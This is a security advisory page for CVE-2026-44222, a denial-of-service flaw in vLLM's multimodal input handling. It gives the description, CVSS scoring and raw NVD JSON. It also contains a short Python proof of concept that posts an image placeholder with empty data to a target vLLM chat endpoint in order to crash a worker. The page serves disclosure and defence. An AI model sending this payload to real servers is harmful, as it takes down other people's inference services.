Security Vulnerability Report
中文
CVE-2026-44222 CVSS 6.5 MEDIUM

CVE-2026-44222

Published: 2026-05-12 20:16:43
Last Modified: 2026-05-12 20:16:43

Description

vLLM is an inference and serving engine for large language models (LLMs). From 0.6.1 to before 0.20.0, there is a a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. This vulnerability is fixed in 0.20.0.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

vLLM 0.6.1 至 0.20.0 之前

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # Target URL (Example) url = "http://target-vllm-instance:8000/v1/chat/completions" # Malicious payload containing an image placeholder without actual image data # This attempts to trigger the IndexError in the multimodal processing path payload = { "model": "meta-llama/Llama-2-7b-chat-hf", "messages": [ { "role": "user", "content": [ {"type": "text", "text": "Analyze this image:"}, # Sending an image type with empty/missing data to trigger the bug {"type": "image_url", "image_url": {"url": "data:image/jpeg;base64,"}} ] } ], "max_tokens": 50 } try: response = requests.post(url, headers={"Content-Type": "application/json"}, data=json.dumps(payload)) print(f"Status Code: {response.status_code}") print(f"Response: {response.text}") except Exception as e: print(f"Request failed: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44222", "sourceIdentifier": "[email protected]", "published": "2026-05-12T20:16:43.160", "lastModified": "2026-05-12T20:16:43.160", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "vLLM is an inference and serving engine for large language models (LLMs). From 0.6.1 to before 0.20.0, there is a a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on image_grid_thw/video_grid_thw are affected. This vulnerability is fixed in 0.20.0."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-129"}]}], "references": [{"url": "https://github.com/vllm-project/vllm/issues/32656", "source": "[email protected]"}, {"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-hpv8-x276-m59f", "source": "[email protected]"}]}}